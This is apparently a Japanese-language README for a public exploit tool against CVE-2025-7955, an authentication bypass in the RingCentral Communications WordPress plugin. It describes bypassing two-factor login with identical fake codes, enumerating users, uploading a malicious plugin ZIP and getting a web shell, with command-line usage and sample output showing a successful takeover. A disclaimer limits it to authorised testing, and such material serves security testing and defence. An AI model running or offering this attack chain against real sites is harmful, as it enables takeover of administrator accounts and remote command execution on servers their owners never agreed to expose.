
RingCentral Communications 1.5 - 1.6.8 - ringcentral_admin_login_2fa_verify 関数におけるサーバーサイド検証の欠如による認証バイパス
RingCentral Communications 1.5 - 1.6.8 - サーバーサイド検証の欠如による認証バイパス(ringcentral_admin_login_2fa_verify 関数)
CVE: CVE-2025-7955
影響を受けるプラグイン: RingCentral Communications (WordPress)
影響を受けるバージョン: 1.5 – 1.6.8
CVSS スコア: 9.8 (Critical)
タイプ: 認証バイパス (サーバーサイド検証の欠如)
WordPress 用 RingCentral Communications プラグインは、
ringcentral_admin_login_2fa_verify()関数内の不適切な検証により、認証バイパスに対して脆弱です。バージョン 1.5 から 1.6.8 では、認証されていない攻撃者が同一の偽コードを送信するだけで、任意のユーザーとしてログインできます。
このエクスプロイトは、CVE-2025-7955 の攻撃チェーン全体を自動化します。次のことを行うように設計されています:
/wp-json/wp/v2/users/ID) を介してユーザー名の列挙を試みます。whoami を実行し、出力を表示することによってコード実行を実証します。悪意のあるプラグインを準備する
スクリプトと同じディレクトリに、悪意のあるプラグイン ZIP ファイル(デフォルト: Nxploit.zip)があることを確認します。
エクスプロイトを実行する:
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (必須) ターゲットの WordPress サイト URL-user, --username : (任意) ログインするユーザー名(省略時は自動検出)-id, --id_admin : (デフォルト: 1) ユーザー ID(管理者は通常 ID 1)-z, --zip : (デフォルト: Nxploit.zip) 悪意のあるプラグイン ZIP へのパス例:
python3 CVE-2025-7955.py -u http://target/wordpress
または、ユーザー名/ID を指定:
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 Exploit By : Nxploited
[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
このツールは、許可されたセキュリティテストおよび教育目的のみを対象としています。
所有していない、または明示的なテスト許可を得ていないシステムへの不正使用は、違法かつ非倫理的です。
著者は、このスクリプトによって引き起こされた誤用や損害について一切の責任を負いません。
By: Khaled Alenazi (Nxploited)
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1